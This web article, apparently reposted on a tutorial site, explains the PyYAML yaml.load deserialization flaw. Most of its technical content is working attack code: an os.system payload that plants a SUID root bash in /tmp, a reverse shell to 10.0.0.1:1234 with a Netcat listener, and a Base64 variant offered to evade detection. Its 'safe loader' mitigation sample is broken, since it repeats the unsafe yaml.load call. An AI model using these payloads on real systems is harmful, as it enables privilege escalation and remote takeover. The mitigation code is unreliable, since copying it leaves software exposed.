The YAML (YAML Ain't Markup Language) library in Python has been identified as having vulnerabilities that allow the execution of arbitrary commands under certain conditions. The vulnerability arises from the use of the yaml.load function without specifying a safe loader. By default, yaml.load can execute arbitrary Python objects, which creates an attack surface for malicious payloads.
The fundamental risk lies in the deserialization process. When a YAML document contains a malicious payload, yaml.load processes the embedded directives, potentially leading to code execution. For example, consider the following snippet:
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
Here, the yaml.load function parses example.yml without restrictions, making it vulnerable if the YAML content includes unsafe directives. A typical exploit payload can be crafted to execute arbitrary system commands.
import yaml from yaml import Loader, UnsafeLoader # Malicious payload payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]' # Exploitation yaml.load(payload) yaml.load(payload, Loader=Loader) yaml.load(payload, Loader=UnsafeLoader)
Each of these invocations processes the payload, resulting in the creation of a privileged executable in /tmp/bash. This binary can then be executed with elevated privileges:
/tmp/bash -p
This demonstrates the potential for privilege escalation if the vulnerability is exploited on a system with misconfigured permissions or other weaknesses.
A particularly insidious use case is leveraging the vulnerability for a reverse shell. This allows attackers to gain remote access to the target machine. The process involves starting a listener on the attacker's machine and crafting a YAML document designed to establish the reverse connection.
On the attacker's machine, initiate a Netcat listener:
nc -lvnp 1234
On the target system, execute the following Python script as root:
import yaml # Reverse shell payload data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]' yaml.load(data) # Executes the reverse shell
This payload instructs the target machine to connect back to the attacker's listener, providing a fully interactive shell with the privileges of the executing process.
To bypass basic security controls or filters, the payload can be Base64-encoded. This method adds a layer of obfuscation, potentially evading detection by static analysis tools.
from base64 import b64decode import yaml # Base64-encoded payload encoded_payload = b"ISFweXRa...YXNoIl0=" # Truncated for brevity payload = b64decode(encoded_payload) # Execute the payload yaml.load(payload)
Professionals must adopt strict coding practices to eliminate such vulnerabilities. Recommended mitigations include:
Using Safe Loaders: Replace yaml.load with yaml.safe_load, which prevents the execution of arbitrary objects.
import yaml filename = "example.yml" data = open(filename, 'r').read() yaml.load(data) # Unsafe usage
Restricting Input Sources: Ensure YAML inputs are sanitized and originate only from trusted sources.
Applying Static Analysis: Use tools to scan codebases for unsafe yaml.load invocations.
Environment Hardening: Restrict system permissions to minimize the impact of exploitation. For example, using containerized environments limits an attacker's ability to escalate privileges.
The YAML library’s default behavior exemplifies the risks associated with deserialization in dynamically typed languages like Python. Exploiting this vulnerability requires minimal sophistication, making it a high-priority issue for secure application development. Adopting safe coding practices, along with robust input validation and runtime safeguards, is imperative to mitigate these risks effectively.
The above is the detailed content of Be Careful When Using YAML in Python! There May Be Security Vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!
Commonly used vbs scripts
Which is better to learn first, c language or c++?
Usage of background-image
How to solve the problem that the phpstudy port is occupied
Flutter framework advantages and disadvantages
special symbol point
How to deduplicate database in mysql
What does Apple LTE network mean?
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
